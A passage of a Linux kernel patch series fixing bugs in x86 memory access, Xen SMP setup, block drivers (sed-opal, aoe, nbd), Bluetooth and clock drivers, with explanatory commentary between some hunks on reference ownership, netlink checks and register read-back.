+index 1dbbad73192a1..f20636510eb1e 100644
+--- a/arch/x86/mm/fault.c
++++ b/arch/x86/mm/fault.c
+@@ -818,15 +818,6 @@ show_signal_msg(struct pt_regs *regs, unsigned long error_code,
+ 	show_opcodes(regs, loglvl);
+ }
+ 
+-/*
+- * The (legacy) vsyscall page is the long page in the kernel portion
+- * of the address space that has user-accessible permissions.
+- */
+-static bool is_vsyscall_vaddr(unsigned long vaddr)
+-{
+-	return unlikely((vaddr & PAGE_MASK) == VSYSCALL_ADDR);
+-}
+-
+ static void
+ __bad_area_nosemaphore(struct pt_regs *regs, unsigned long error_code,
+ 		       unsigned long address, u32 pkey, int si_code)
+diff --git a/arch/x86/mm/maccess.c b/arch/x86/mm/maccess.c
+index 6993f026adec9..42115ac079cfe 100644
+--- a/arch/x86/mm/maccess.c
++++ b/arch/x86/mm/maccess.c
+@@ -3,6 +3,8 @@
+ #include <linux/uaccess.h>
+ #include <linux/kernel.h>
+ 
++#include <asm/vsyscall.h>
++
+ #ifdef CONFIG_X86_64
+ bool copy_from_kernel_nofault_allowed(const void *unsafe_src, size_t size)
+ {
+@@ -15,6 +17,14 @@ bool copy_from_kernel_nofault_allowed(const void *unsafe_src, size_t size)
+ 	if (vaddr < TASK_SIZE_MAX + PAGE_SIZE)
+ 		return false;
+ 
++	/*
++	 * Reading from the vsyscall page may cause an unhandled fault in
++	 * certain cases.  Though it is at an address above TASK_SIZE_MAX, it is
++	 * usually considered a user space address.
++	 */
++	if (is_vsyscall_vaddr(vaddr))
++		return false;
++
+ 	/*
+ 	 * Allow everything during early boot before 'x86_virt_bits'
+ 	 * is initialized.  Needed for instruction decoding in early
+diff --git a/arch/x86/mm/mem_encrypt_identity.c b/arch/x86/mm/mem_encrypt_identity.c
+index d94ebd8acdfde..a11a6ebbf5ecf 100644
+--- a/arch/x86/mm/mem_encrypt_identity.c
++++ b/arch/x86/mm/mem_encrypt_identity.c
+@@ -507,7 +507,6 @@ void __init sme_enable(struct boot_params *bp)
+ 	const char *cmdline_ptr, *cmdline_arg, *cmdline_on, *cmdline_off;
+ 	unsigned int eax, ebx, ecx, edx;
+ 	unsigned long feature_mask;
+-	bool active_by_default;
+ 	unsigned long me_mask;
+ 	char buffer[16];
+ 	bool snp;
+@@ -593,22 +592,19 @@ void __init sme_enable(struct boot_params *bp)
+ 	     : "p" (sme_cmdline_off));
+ 
+ 	if (IS_ENABLED(CONFIG_AMD_MEM_ENCRYPT_ACTIVE_BY_DEFAULT))
+-		active_by_default = true;
+-	else
+-		active_by_default = false;
++		sme_me_mask = me_mask;
+ 
+ 	cmdline_ptr = (const char *)((u64)bp->hdr.cmd_line_ptr |
+ 				     ((u64)bp->ext_cmd_line_ptr << 32));
+ 
+ 	if (cmdline_find_option(cmdline_ptr, cmdline_arg, buffer, sizeof(buffer)) < 0)
+-		return;
++		goto out;
+ 
+ 	if (!strncmp(buffer, cmdline_on, sizeof(buffer)))
+ 		sme_me_mask = me_mask;
+ 	else if (!strncmp(buffer, cmdline_off, sizeof(buffer)))
+ 		sme_me_mask = 0;
+-	else
+-		sme_me_mask = active_by_default ? me_mask : 0;
++
+ out:
+ 	if (sme_me_mask) {
+ 		physical_mask &= ~sme_me_mask;
+diff --git a/arch/x86/tools/relocs.c b/arch/x86/tools/relocs.c
+index 2925074b9a588..9a5b101c45023 100644
+--- a/arch/x86/tools/relocs.c
++++ b/arch/x86/tools/relocs.c
+@@ -653,6 +653,14 @@ static void print_absolute_relocs(void)
+ 		if (!(sec_applies->shdr.sh_flags & SHF_ALLOC)) {
+ 			continue;
+ 		}
++		/*
++		 * Do not perform relocations in .notes section; any
++		 * values there are meant for pre-boot consumption (e.g.
++		 * startup_xen).
++		 */
++		if (sec_applies->shdr.sh_type == SHT_NOTE) {
++			continue;
++		}
+ 		sh_symtab  = sec_symtab->symtab;
+ 		sym_strtab = sec_symtab->link->strtab;
+ 		for (j = 0; j < sec->shdr.sh_size/sizeof(Elf_Rel); j++) {
+diff --git a/arch/x86/xen/smp.c b/arch/x86/xen/smp.c
+index 4b0d6fff88de5..1fb9a1644d944 100644
+--- a/arch/x86/xen/smp.c
++++ b/arch/x86/xen/smp.c
+@@ -65,6 +65,8 @@ int xen_smp_intr_init(unsigned int cpu)
+ 	char *resched_name, *callfunc_name, *debug_name;
+ 
+ 	resched_name = kasprintf(GFP_KERNEL, "resched%d", cpu);
++	if (!resched_name)
++		goto fail_mem;
+ 	per_cpu(xen_resched_irq, cpu).name = resched_name;
+ 	rc = bind_ipi_to_irqhandler(XEN_RESCHEDULE_VECTOR,
+ 				    cpu,
+@@ -77,6 +79,8 @@ int xen_smp_intr_init(unsigned int cpu)
+ 	per_cpu(xen_resched_irq, cpu).irq = rc;
+ 
+ 	callfunc_name = kasprintf(GFP_KERNEL, "callfunc%d", cpu);
++	if (!callfunc_name)
++		goto fail_mem;
+ 	per_cpu(xen_callfunc_irq, cpu).name = callfunc_name;
+ 	rc = bind_ipi_to_irqhandler(XEN_CALL_FUNCTION_VECTOR,
+ 				    cpu,
+@@ -90,6 +94,9 @@ int xen_smp_intr_init(unsigned int cpu)
+ 
+ 	if (!xen_fifo_events) {
+ 		debug_name = kasprintf(GFP_KERNEL, "debug%d", cpu);
++		if (!debug_name)
++			goto fail_mem;
++
+ 		per_cpu(xen_debug_irq, cpu).name = debug_name;
+ 		rc = bind_virq_to_irqhandler(VIRQ_DEBUG, cpu,
+ 					     xen_debug_interrupt,
+@@ -101,6 +108,9 @@ int xen_smp_intr_init(unsigned int cpu)
+ 	}
+ 
+ 	callfunc_name = kasprintf(GFP_KERNEL, "callfuncsingle%d", cpu);
++	if (!callfunc_name)
++		goto fail_mem;
++
+ 	per_cpu(xen_callfuncsingle_irq, cpu).name = callfunc_name;
+ 	rc = bind_ipi_to_irqhandler(XEN_CALL_FUNCTION_SINGLE_VECTOR,
+ 				    cpu,
+@@ -114,6 +124,8 @@ int xen_smp_intr_init(unsigned int cpu)
+ 
+ 	return 0;
+ 
++ fail_mem:
++	rc = -ENOMEM;
+  fail:
+ 	xen_smp_intr_free(cpu);
+ 	return rc;
+diff --git a/block/opal_proto.h b/block/opal_proto.h
+index 7152aa1f1a49e..7f306b08a0fe7 100644
+--- a/block/opal_proto.h
++++ b/block/opal_proto.h
+@@ -71,6 +71,7 @@ enum opal_response_token {
+ #define SHORT_ATOM_BYTE  0xBF
+ #define MEDIUM_ATOM_BYTE 0xDF
+ #define LONG_ATOM_BYTE   0xE3
++#define EMPTY_ATOM_BYTE  0xFF
+ 
+ #define OPAL_INVAL_PARAM 12
+ #define OPAL_MANUFACTURED_INACTIVE 0x08
+diff --git a/block/sed-opal.c b/block/sed-opal.c
+index 9bdb833e5817d..25e4ce452c1d3 100644
+--- a/block/sed-opal.c
++++ b/block/sed-opal.c
+@@ -935,16 +935,20 @@ static int response_parse(const u8 *buf, size_t length,
+ 			token_length = response_parse_medium(iter, pos);
+ 		else if (pos[0] <= LONG_ATOM_BYTE) /* long atom */
+ 			token_length = response_parse_long(iter, pos);
++		else if (pos[0] == EMPTY_ATOM_BYTE) /* empty atom */
++			token_length = 1;
+ 		else /* TOKEN */
+ 			token_length = response_parse_token(iter, pos);
+ 
+ 		if (token_length < 0)
+ 			return token_length;
+ 
++		if (pos[0] != EMPTY_ATOM_BYTE)
++			num_entries++;
++
+ 		pos += token_length;
+ 		total -= token_length;
+ 		iter++;
+-		num_entries++;
+ 	}
+ 
+ 	resp->num = num_entries;
+diff --git a/crypto/Kconfig b/crypto/Kconfig
+index d779667671b23..edf193aff23e7 100644
+--- a/crypto/Kconfig
++++ b/crypto/Kconfig
+@@ -1285,10 +1285,11 @@ config CRYPTO_JITTERENTROPY
+ 
+ 	  A non-physical non-deterministic ("true") RNG (e.g., an entropy source
+ 	  compliant with NIST SP800-90B) intended to provide a seed to a
+-	  deterministic RNG (e.g.  per NIST SP800-90C).
++	  deterministic RNG (e.g., per NIST SP800-90C).
+ 	  This RNG does not perform any cryptographic whitening of the generated
++	  random numbers.
+ 
+-	  See https://www.chronox.de/jent.html
++	  See https://www.chronox.de/jent/
+ 
+ config CRYPTO_KDF800108_CTR
+ 	tristate
+diff --git a/drivers/acpi/processor_idle.c b/drivers/acpi/processor_idle.c
+index fc5b5b2c9e819..6f613eef28879 100644
+--- a/drivers/acpi/processor_idle.c
++++ b/drivers/acpi/processor_idle.c
+@@ -1431,6 +1431,8 @@ int acpi_processor_power_exit(struct acpi_processor *pr)
+ 		acpi_processor_registered--;
+ 		if (acpi_processor_registered == 0)
+ 			cpuidle_unregister_driver(&acpi_idle_driver);
++
++		kfree(dev);
+ 	}
+ 
+ 	pr->flags.power_setup_done = 0;
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index 5ebeb0d7b6be0..1c5c1a269fbee 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -543,6 +543,39 @@ static const struct dmi_system_id lg_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "17U70P"),
+ 		},
+ 	},
++	{
++		/* Infinity E15-5A165-BM */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "GM5RG1E0009COM"),
++		},
++	},
++	{
++		/* Infinity E15-5A305-1M */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "GM5RGEE0016COM"),
++		},
++	},
++	{
++		/* Lunnen Ground 15 / AMD Ryzen 5 5500U */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Lunnen"),
++			DMI_MATCH(DMI_BOARD_NAME, "LLL5DAW"),
++		},
++	},
++	{
++		/* Lunnen Ground 16 / AMD Ryzen 7 5800U */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Lunnen"),
++			DMI_MATCH(DMI_BOARD_NAME, "LL6FA"),
++		},
++	},
++	{
++		/* MAIBENBEN X577 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "MAIBENBEN"),
++			DMI_MATCH(DMI_BOARD_NAME, "X577"),
++		},
++	},
+ 	{ }
+ };
+ 
+diff --git a/drivers/acpi/scan.c b/drivers/acpi/scan.c
+index 94154a849a3ea..293cdf486fd81 100644
+--- a/drivers/acpi/scan.c
++++ b/drivers/acpi/scan.c
+@@ -315,18 +315,14 @@ static int acpi_scan_device_check(struct acpi_device *adev)
+ 		 * again).
+ 		 */
+ 		if (adev->handler) {
+-			dev_warn(&adev->dev, "Already enumerated\n");
+-			return -EALREADY;
++			dev_dbg(&adev->dev, "Already enumerated\n");
++			return 0;
+ 		}
+ 		error = acpi_bus_scan(adev->handle);
+ 		if (error) {
+ 			dev_warn(&adev->dev, "Namespace scan failure\n");
+ 			return error;
+ 		}
+-		if (!adev->handler) {
+-			dev_warn(&adev->dev, "Enumeration failure\n");
+-			error = -ENODEV;
+-		}
+ 	} else {
+ 		error = acpi_scan_device_not_present(adev);
+ 	}
+diff --git a/drivers/block/aoe/aoecmd.c b/drivers/block/aoe/aoecmd.c
+index d7317425be510..cc9077b588d7e 100644
+--- a/drivers/block/aoe/aoecmd.c
++++ b/drivers/block/aoe/aoecmd.c
+@@ -419,13 +419,16 @@ aoecmd_cfg_pkts(ushort aoemajor, unsigned char aoeminor, struct sk_buff_head *qu
+ 	rcu_read_lock();
+ 	for_each_netdev_rcu(&init_net, ifp) {
+ 		dev_hold(ifp);
+-		if (!is_aoe_netif(ifp))
+-			goto cont;
++		if (!is_aoe_netif(ifp)) {
++			dev_put(ifp);
++			continue;
++		}
+ 
+ 		skb = new_skb(sizeof *h + sizeof *ch);
+ 		if (skb == NULL) {
+ 			printk(KERN_INFO "aoe: skb alloc failure\n");
+-			goto cont;
++			dev_put(ifp);
++			continue;
+ 		}
+ 		skb_put(skb, sizeof *h + sizeof *ch);
+ 		skb->dev = ifp;
+@@ -440,9 +443,6 @@ aoecmd_cfg_pkts(ushort aoemajor, unsigned char aoeminor, struct sk_buff_head *qu
+ 		h->major = cpu_to_be16(aoemajor);
+ 		h->minor = aoeminor;
+ 		h->cmd = AOECMD_CFG;
+-
+-cont:
+-		dev_put(ifp);
+ 	}
+ 	rcu_read_unlock();
+ }
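
This hunk and the aoenet.c one just below change who owns the netdev reference: previously every loop iteration ended in dev_put(), so a queued skb kept pointing at an interface it no longer held a reference on. Now the error paths drop the reference immediately, while the success path leaves it attached to the skb until tx() releases it after transmission. A toy userspace model of that ownership transfer (the refcount struct and names are invented for illustration):

#include <stdio.h>

struct netif { int refs; };

static void hold(struct netif *d) { d->refs++; }
static void put(struct netif *d)  { d->refs--; }

/* Producer: take a reference; on failure drop it at once, on success
 * hand it to the queued packet. */
static int queue_packet(struct netif *d, int alloc_ok, struct netif **pkt_owner)
{
	hold(d);
	if (!alloc_ok) {
		put(d);			/* mirrors the new dev_put(); continue; */
		return -1;
	}
	*pkt_owner = d;			/* reference travels with the packet */
	return 0;
}

/* Consumer: the transmit path drops the packet's reference when done. */
static void tx_done(struct netif **pkt_owner)
{
	put(*pkt_owner);
	*pkt_owner = NULL;
}

int main(void)
{
	struct netif dev = { .refs = 1 };
	struct netif *pkt_owner = NULL;

	if (queue_packet(&dev, 1, &pkt_owner) == 0)
		tx_done(&pkt_owner);
	printf("refs = %d\n", dev.refs);	/* back to 1: balanced */
	return 0;
}
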
+diff --git a/drivers/block/aoe/aoenet.c b/drivers/block/aoe/aoenet.c
+index 63773a90581dd..1e66c7a188a12 100644
+--- a/drivers/block/aoe/aoenet.c
++++ b/drivers/block/aoe/aoenet.c
+@@ -64,6 +64,7 @@ tx(int id) __must_hold(&txlock)
+ 			pr_warn("aoe: packet could not be sent on %s.  %s\n",
+ 				ifp ? ifp->name : "netif",
+ 				"consider increasing tx_queue_len");
++		dev_put(ifp);
+ 		spin_lock_irq(&txlock);
+ 	}
+ 	return 0;
+diff --git a/drivers/block/nbd.c b/drivers/block/nbd.c
+index 9a53165de4cef..5c4be8dda253c 100644
+--- a/drivers/block/nbd.c
++++ b/drivers/block/nbd.c
+@@ -2408,6 +2408,12 @@ static int nbd_genl_status(struct sk_buff *skb, struct genl_info *info)
+ 	}
+ 
+ 	dev_list = nla_nest_start_noflag(reply, NBD_ATTR_DEVICE_LIST);
++	if (!dev_list) {
++		nlmsg_free(reply);
++		ret = -EMSGSIZE;
++		goto out;
++	}
++
+ 	if (index == -1) {
+ 		ret = idr_for_each(&nbd_index_idr, &status_cb, reply);
+ 		if (ret) {
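
The nbd change is standard netlink discipline: nla_nest_start_noflag() returns NULL once the message buffer cannot fit the nest attribute, and the reply was previously filled in through that NULL. A compressed kernel-style sketch of the checked pattern (not standalone; the real hunk additionally frees the reply and exits through the function's common out label):

/* Always check the nest pointer before populating it. */
static int fill_device_list(struct sk_buff *reply)
{
	struct nlattr *dev_list;

	dev_list = nla_nest_start_noflag(reply, NBD_ATTR_DEVICE_LIST);
	if (!dev_list)
		return -EMSGSIZE;	/* message buffer exhausted */

	/* ... emit one entry per device ... */

	nla_nest_end(reply, dev_list);
	return 0;
}
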
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 8bfef7f81b417..2acda547f4f3e 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -2254,7 +2254,7 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 
+ 		qcadev->bt_en = devm_gpiod_get_optional(&serdev->dev, "enable",
+ 					       GPIOD_OUT_LOW);
+-		if (IS_ERR_OR_NULL(qcadev->bt_en) &&
++		if (IS_ERR(qcadev->bt_en) &&
+ 		    (data->soc_type == QCA_WCN6750 ||
+ 		     data->soc_type == QCA_WCN6855)) {
+ 			dev_err(&serdev->dev, "failed to acquire BT_EN gpio\n");
+@@ -2263,7 +2263,7 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 
+ 		qcadev->sw_ctrl = devm_gpiod_get_optional(&serdev->dev, "swctrl",
+ 					       GPIOD_IN);
+-		if (IS_ERR_OR_NULL(qcadev->sw_ctrl) &&
++		if (IS_ERR(qcadev->sw_ctrl) &&
+ 		    (data->soc_type == QCA_WCN6750 ||
+ 		     data->soc_type == QCA_WCN6855 ||
+ 		     data->soc_type == QCA_WCN7850))
+@@ -2285,7 +2285,7 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 	default:
+ 		qcadev->bt_en = devm_gpiod_get_optional(&serdev->dev, "enable",
+ 					       GPIOD_OUT_LOW);
+-		if (IS_ERR_OR_NULL(qcadev->bt_en)) {
++		if (IS_ERR(qcadev->bt_en)) {
+ 			dev_warn(&serdev->dev, "failed to acquire enable gpio\n");
+ 			power_ctrl_enabled = false;
+ 		}
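
The hci_qca hunks hinge on the *_optional GPIO contract: devm_gpiod_get_optional() returns NULL, not an error pointer, when the line is simply absent from firmware, so IS_ERR_OR_NULL() was turning a legitimately missing pin into a probe failure. Only IS_ERR() indicates a real error (including -EPROBE_DEFER). Sketch of the intended pattern (kernel-style, hypothetical helper):

/* NULL means "not wired up, and that's fine"; ERR_PTR means failure. */
static int get_enable_gpio(struct device *dev, struct gpio_desc **out)
{
	struct gpio_desc *g = devm_gpiod_get_optional(dev, "enable",
						      GPIOD_OUT_LOW);

	if (IS_ERR(g))
		return PTR_ERR(g);	/* propagate, may be -EPROBE_DEFER */

	*out = g;	/* may be NULL; gpiod_set_value(NULL, ...) is a no-op */
	return 0;
}
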
+diff --git a/drivers/bus/Kconfig b/drivers/bus/Kconfig
+index 7bfe998f3514a..bdc7633905504 100644
+--- a/drivers/bus/Kconfig
++++ b/drivers/bus/Kconfig
+@@ -186,11 +186,12 @@ config SUNXI_RSB
+ 
+ config TEGRA_ACONNECT
+ 	tristate "Tegra ACONNECT Bus Driver"
+-	depends on ARCH_TEGRA_210_SOC
++	depends on ARCH_TEGRA
+ 	depends on OF && PM
+ 	help
+ 	  Driver for the Tegra ACONNECT bus which is used to interface with
+-	  the devices inside the Audio Processing Engine (APE) for Tegra210.
++	  the devices inside the Audio Processing Engine (APE) for
++	  Tegra210 and later.
+ 
+ config TEGRA_GMI
+ 	tristate "Tegra Generic Memory Interface bus driver"
+diff --git a/drivers/clk/clk.c b/drivers/clk/clk.c
+index 33fedbd096f33..9004e07182259 100644
+--- a/drivers/clk/clk.c
++++ b/drivers/clk/clk.c
+@@ -407,6 +407,9 @@ static struct clk_core *clk_core_get(struct clk_core *core, u8 p_index)
+ 	if (IS_ERR(hw))
+ 		return ERR_CAST(hw);
+ 
++	if (!hw)
++		return NULL;
++
+ 	return hw->core;
+ }
+ 
+diff --git a/drivers/clk/hisilicon/clk-hi3519.c b/drivers/clk/hisilicon/clk-hi3519.c
+index ad0c7f350cf03..60d8a27a90824 100644
+--- a/drivers/clk/hisilicon/clk-hi3519.c
++++ b/drivers/clk/hisilicon/clk-hi3519.c
+@@ -130,7 +130,7 @@ static void hi3519_clk_unregister(struct platform_device *pdev)
+ 	of_clk_del_provider(pdev->dev.of_node);
+ 
+ 	hisi_clk_unregister_gate(hi3519_gate_clks,
+-				ARRAY_SIZE(hi3519_mux_clks),
++				ARRAY_SIZE(hi3519_gate_clks),
+ 				crg->clk_data);
+ 	hisi_clk_unregister_mux(hi3519_mux_clks,
+ 				ARRAY_SIZE(hi3519_mux_clks),
+diff --git a/drivers/clk/hisilicon/clk-hi3559a.c b/drivers/clk/hisilicon/clk-hi3559a.c
+index 9ea1a80acbe8b..0272276550ff1 100644
+--- a/drivers/clk/hisilicon/clk-hi3559a.c
++++ b/drivers/clk/hisilicon/clk-hi3559a.c
+@@ -491,7 +491,6 @@ static void hisi_clk_register_pll(struct hi3559av100_pll_clock *clks,
+ 
+ 		clk = clk_register(NULL, &p_clk->hw);
+ 		if (IS_ERR(clk)) {
+-			devm_kfree(dev, p_clk);
+ 			dev_err(dev, "%s: failed to register clock %s\n",
+ 			       __func__, clks[i].name);
+ 			continue;
+diff --git a/drivers/clk/meson/axg.c b/drivers/clk/meson/axg.c
+index 2ad3801398dc1..7802dabb26f6d 100644
+--- a/drivers/clk/meson/axg.c
++++ b/drivers/clk/meson/axg.c
+@@ -2144,7 +2144,9 @@ static struct clk_regmap *const axg_clk_regmaps[] = {
+ 	&axg_vclk_input,
+ 	&axg_vclk2_input,
+ 	&axg_vclk_div,
++	&axg_vclk_div1,
+ 	&axg_vclk2_div,
++	&axg_vclk2_div1,
+ 	&axg_vclk_div2_en,
+ 	&axg_vclk_div4_en,
+ 	&axg_vclk_div6_en,
+diff --git a/drivers/clk/qcom/dispcc-sdm845.c b/drivers/clk/qcom/dispcc-sdm845.c
+index 735adfefc3798..e792e0b130d33 100644
+--- a/drivers/clk/qcom/dispcc-sdm845.c
++++ b/drivers/clk/qcom/dispcc-sdm845.c
+@@ -759,6 +759,8 @@ static struct clk_branch disp_cc_mdss_vsync_clk = {
+ 
+ static struct gdsc mdss_gdsc = {
+ 	.gdscr = 0x3000,
++	.en_few_wait_val = 0x6,
++	.en_rest_wait_val = 0x5,
+ 	.pd = {
+ 		.name = "mdss_gdsc",
+ 	},
+diff --git a/drivers/clk/qcom/reset.c b/drivers/clk/qcom/reset.c
+index e45e32804d2c7..d96c96a9089f4 100644
+--- a/drivers/clk/qcom/reset.c
++++ b/drivers/clk/qcom/reset.c
+@@ -22,8 +22,8 @@ static int qcom_reset(struct reset_controller_dev *rcdev, unsigned long id)
+ 	return 0;
+ }
+ 
+-static int
+-qcom_reset_assert(struct reset_controller_dev *rcdev, unsigned long id)
++static int qcom_reset_set_assert(struct reset_controller_dev *rcdev,
++				 unsigned long id, bool assert)
+ {
+ 	struct qcom_reset_controller *rst;
+ 	const struct qcom_reset_map *map;
+@@ -33,21 +33,22 @@ qcom_reset_assert(struct reset_controller_dev *rcdev, unsigned long id)
+ 	map = &rst->reset_map[id];
+ 	mask = map->bitmask ? map->bitmask : BIT(map->bit);
+ 
+-	return regmap_update_bits(rst->regmap, map->reg, mask, mask);
++	regmap_update_bits(rst->regmap, map->reg, mask, assert ? mask : 0);
++
++	/* Read back the register to ensure write completion, ignore the value */
++	regmap_read(rst->regmap, map->reg, &mask);
++
++	return 0;
+ }
+ 
+-static int
+-qcom_reset_deassert(struct reset_controller_dev *rcdev, unsigned long id)
++static int qcom_reset_assert(struct reset_controller_dev *rcdev, unsigned long id)
+ {
+-	struct qcom_reset_controller *rst;
+-	const struct qcom_reset_map *map;
+-	u32 mask;
+-
+-	rst = to_qcom_reset_controller(rcdev);
+-	map = &rst->reset_map[id];
+-	mask = map->bitmask ? map->bitmask : BIT(map->bit);
++	return qcom_reset_set_assert(rcdev, id, true);
++}
+ 
+-	return regmap_update_bits(rst->regmap, map->reg, mask, 0);
++static int qcom_reset_deassert(struct reset_controller_dev *rcdev, unsigned long id)
++{
++	return qcom_reset_set_assert(rcdev, id, false);
+ }
+ 
+ const struct reset_control_ops qcom_reset_ops = {
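
Two things happen in the qcom reset rework: the duplicated assert/deassert bodies collapse into one helper, and a read-back is added so the register write is actually posted before the reset call returns; otherwise a buffered write could still be in flight when the caller starts its post-reset delay. The read-back idiom in isolation, as a hedged kernel-style sketch (helper name is mine):

/* Force write completion on posted-write buses: read the register back
 * and discard the value; only the ordering matters. */
static void regmap_write_posted(struct regmap *map, unsigned int reg,
				unsigned int mask, unsigned int val)
{
	unsigned int dummy;

	regmap_update_bits(map, reg, mask, val);
	regmap_read(map, reg, &dummy);
}
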
+diff --git a/drivers/clk/renesas/r8a779f0-cpg-mssr.c b/drivers/clk/renesas/r8a779f0-cpg-mssr.c
+index 27b668def357f..7a49b91c93710 100644
+--- a/drivers/clk/renesas/r8a779f0-cpg-mssr.c
++++ b/drivers/clk/renesas/r8a779f0-cpg-mssr.c
+@@ -159,7 +159,7 @@ static const struct mssr_mod_clk r8a779f0_mod_clks[] __initconst = {
+ 	DEF_MOD("cmt1",		911,	R8A779F0_CLK_R),
+ 	DEF_MOD("cmt2",		912,	R8A779F0_CLK_R),
+ 	DEF_MOD("cmt3",		913,	R8A779F0_CLK_R),
+-	DEF_MOD("pfc0",		915,	R8A779F0_CLK_CL16M),
++	DEF_MOD("pfc0",		915,	R8A779F0_CLK_CPEX),
+ 	DEF_MOD("tsc",		919,	R8A779F0_CLK_CL16M),
+ 	DEF_MOD("ufs",		1514,	R8A779F0_CLK_S0D4_HSC),
+ };
+diff --git a/drivers/clk/renesas/r8a779g0-cpg-mssr.c b/drivers/clk/renesas/r8a779g0-cpg-mssr.c
+index d5b325e3c5398..e4c616921e5ea 100644
+--- a/drivers/clk/renesas/r8a779g0-cpg-mssr.c
++++ b/drivers/clk/renesas/r8a779g0-cpg-mssr.c
+@@ -22,7 +22,7 @@
+ 
+ enum clk_ids {
+ 	/* Core Clock Outputs exported to DT */
+-	LAST_DT_CORE_CLK = R8A779G0_CLK_R,
++	LAST_DT_CORE_CLK = R8A779G0_CLK_CP,
+ 
+ 	/* External Input Clocks */
+ 	CLK_EXTAL,
+@@ -139,6 +139,7 @@ static const struct cpg_core_clk r8a779g0_core_clks[] __initconst = {
+ 	DEF_FIXED("svd2_vip",	R8A779G0_CLK_SVD2_VIP,	CLK_SV_VIP,	2, 1),
+ 	DEF_FIXED("cbfusa",	R8A779G0_CLK_CBFUSA,	CLK_EXTAL,	2, 1),
+ 	DEF_FIXED("cpex",	R8A779G0_CLK_CPEX,	CLK_EXTAL,	2, 1),
++	DEF_FIXED("cp",		R8A779G0_CLK_CP,	CLK_EXTAL,	2, 1),
+ 	DEF_FIXED("viobus",	R8A779G0_CLK_VIOBUS,	CLK_VIO,	1, 1),
+ 	DEF_FIXED("viobusd2",	R8A779G0_CLK_VIOBUSD2,	CLK_VIO,	2, 1),
+ 	DEF_FIXED("vcbus",	R8A779G0_CLK_VCBUS,	CLK_VC,		1, 1),
+@@ -169,10 +170,17 @@ static const struct mssr_mod_clk r8a779g0_mod_clks[] __initconst = {
+ 	DEF_MOD("i2c4",		522,	R8A779G0_CLK_S0D6_PER),
+ 	DEF_MOD("i2c5",		523,	R8A779G0_CLK_S0D6_PER),
+ 	DEF_MOD("wdt1:wdt0",	907,	R8A779G0_CLK_R),
+-	DEF_MOD("pfc0",		915,	R8A779G0_CLK_CL16M),
+-	DEF_MOD("pfc1",		916,	R8A779G0_CLK_CL16M),
+-	DEF_MOD("pfc2",		917,	R8A779G0_CLK_CL16M),
+-	DEF_MOD("pfc3",		918,	R8A779G0_CLK_CL16M),
++	DEF_MOD("cmt0",		910,	R8A779G0_CLK_R),
++	DEF_MOD("cmt1",		911,	R8A779G0_CLK_R),
++	DEF_MOD("cmt2",		912,	R8A779G0_CLK_R),
++	DEF_MOD("cmt3",		913,	R8A779G0_CLK_R),
++	DEF_MOD("pfc0",		915,	R8A779G0_CLK_CP),
++	DEF_MOD("pfc1",		916,	R8A779G0_CLK_CP),
++	DEF_MOD("pfc2",		917,	R8A779G0_CLK_CP),
++	DEF_MOD("pfc3",		918,	R8A779G0_CLK_CP),
++	DEF_MOD("tsc",		919,	R8A779G0_CLK_CL16M),
++	DEF_MOD("ssiu",		2926,	R8A779G0_CLK_S0D6_PER),
++	DEF_MOD("ssi",		2927,	R8A779G0_CLK_S0D6_PER),
+ };
+ 
+ /*
+diff --git a/drivers/clk/samsung/clk-exynos850.c b/drivers/clk/samsung/clk-exynos850.c
+index 541761e96aeb6..87e463ad42741 100644
+--- a/drivers/clk/samsung/clk-exynos850.c
++++ b/drivers/clk/samsung/clk-exynos850.c
+@@ -572,7 +572,7 @@ static const struct samsung_div_clock apm_div_clks[] __initconst = {
+ 
+ static const struct samsung_gate_clock apm_gate_clks[] __initconst = {
+ 	GATE(CLK_GOUT_CLKCMU_CMGP_BUS, "gout_clkcmu_cmgp_bus", "dout_apm_bus",
+-	     CLK_CON_GAT_CLKCMU_CMGP_BUS, 21, 0, 0),
++	     CLK_CON_GAT_CLKCMU_CMGP_BUS, 21, CLK_SET_RATE_PARENT, 0),
+ 	GATE(CLK_GOUT_CLKCMU_CHUB_BUS, "gout_clkcmu_chub_bus",
+ 	     "mout_clkcmu_chub_bus",
+ 	     CLK_CON_GAT_GATE_CLKCMU_CHUB_BUS, 21, 0, 0),
+@@ -936,19 +936,19 @@ static const struct samsung_fixed_rate_clock cmgp_fixed_clks[] __initconst = {
+ static const struct samsung_mux_clock cmgp_mux_clks[] __initconst = {
+ 	MUX(CLK_MOUT_CMGP_ADC, "mout_cmgp_adc", mout_cmgp_adc_p,
+ 	    CLK_CON_MUX_CLK_CMGP_ADC, 0, 1),
+-	MUX(CLK_MOUT_CMGP_USI0, "mout_cmgp_usi0", mout_cmgp_usi0_p,
+-	    CLK_CON_MUX_MUX_CLK_CMGP_USI_CMGP0, 0, 1),
+-	MUX(CLK_MOUT_CMGP_USI1, "mout_cmgp_usi1", mout_cmgp_usi1_p,
+-	    CLK_CON_MUX_MUX_CLK_CMGP_USI_CMGP1, 0, 1),
++	MUX_F(CLK_MOUT_CMGP_USI0, "mout_cmgp_usi0", mout_cmgp_usi0_p,
++	      CLK_CON_MUX_MUX_CLK_CMGP_USI_CMGP0, 0, 1, CLK_SET_RATE_PARENT, 0),
++	MUX_F(CLK_MOUT_CMGP_USI1, "mout_cmgp_usi1", mout_cmgp_usi1_p,
++	      CLK_CON_MUX_MUX_CLK_CMGP_USI_CMGP1, 0, 1, CLK_SET_RATE_PARENT, 0),
+ };
+ 
+ static const struct samsung_div_clock cmgp_div_clks[] __initconst = {
+ 	DIV(CLK_DOUT_CMGP_ADC, "dout_cmgp_adc", "gout_clkcmu_cmgp_bus",
+ 	    CLK_CON_DIV_DIV_CLK_CMGP_ADC, 0, 4),
+-	DIV(CLK_DOUT_CMGP_USI0, "dout_cmgp_usi0", "mout_cmgp_usi0",
+-	    CLK_CON_DIV_DIV_CLK_CMGP_USI_CMGP0, 0, 5),
